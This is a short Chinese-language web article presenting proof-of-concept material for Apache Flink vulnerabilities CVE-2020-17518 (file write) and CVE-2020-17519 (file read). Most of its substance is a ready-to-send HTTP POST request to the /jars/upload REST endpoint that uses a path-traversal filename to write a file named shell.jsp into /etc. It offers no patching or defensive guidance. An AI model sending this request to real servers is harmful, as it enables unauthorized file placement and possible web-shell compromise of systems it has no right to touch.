您好,登錄后才能下訂單哦!
今天就跟大家聊聊有關(guān) Apache Flink POC漏洞CVE-2020-17518/17519的示例分析,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結(jié)了以下內(nèi)容,希望大家根據(jù)這篇文章可以有所收獲。
?
CVE-2020-17518: 文件寫入
攻擊者利用REST API,可以修改HTTP頭,將上傳的文件寫入到本地文件系統(tǒng)上的任意位置(Flink 1.5.1進程能訪問到的)
CVE-2020-17519: 文件讀取
Apache Flink 1.11.0 允許攻擊者通過JobManager進程的REST API讀取JobManager本地文件系統(tǒng)上的任何文件(JobManager進程能訪問到的)
POC:
POST /jars/upload HTTP/1.1
Host: IP:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 189
------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../etc/shell.jsp"
success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
看完上述內(nèi)容,你們對 Apache Flink POC漏洞CVE-2020-17518/17519的示例分析有進一步的了解嗎?如果還想了解更多知識或者相關(guān)內(nèi)容,請關(guān)注億速云行業(yè)資訊頻道,感謝大家的支持。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。